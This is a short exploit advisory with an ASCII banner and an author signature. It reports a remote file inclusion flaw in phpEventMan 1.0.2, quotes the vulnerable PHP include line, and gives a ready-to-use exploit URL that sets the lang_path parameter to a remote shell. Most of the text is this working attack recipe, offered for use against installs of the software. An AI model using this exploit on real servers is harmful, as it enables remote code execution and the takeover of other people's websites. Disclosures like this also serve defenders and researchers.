___.                        .__.__  .__  __                 __    
  ____ ___.__.\_ |__   ___________  _____ |__|  | |__|/  |______    _____/  |_   
_/ ___<   |  | | __ \_/ __ \_  __ \/     \|  |  | |  \   __\__  \  /    \   __\  
\  \___\___  | | \_\ \  ___/|  | \/  Y Y  \  |  |_|  ||  |  / __ \|   |  \  |    
 \___  > ____| |___  /\___  >__|  |__|_|  /__|____/__||__| (____  /___|  /__|    
     \/\/          \/     \/            \/                      \/     \/      

-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_    
                                                                                 
Author: cybermilitant                    
Site: www.hacktime.org  
E-Mail: cybermilitant.ht@gmail.com         
Vulnerability: Remote File Include
Script: phpEventMan 1.0.2
Download: http://sourceforge.net/project/showfiles.php?group_id=169887

Vulnerable code:
include($lang_path.'phpmailer.lang-en.php');

Exploit:
http://localhost/phpevent/Shared/objects/thirdparty/class.phpmailer.php?lang_path=[shell]?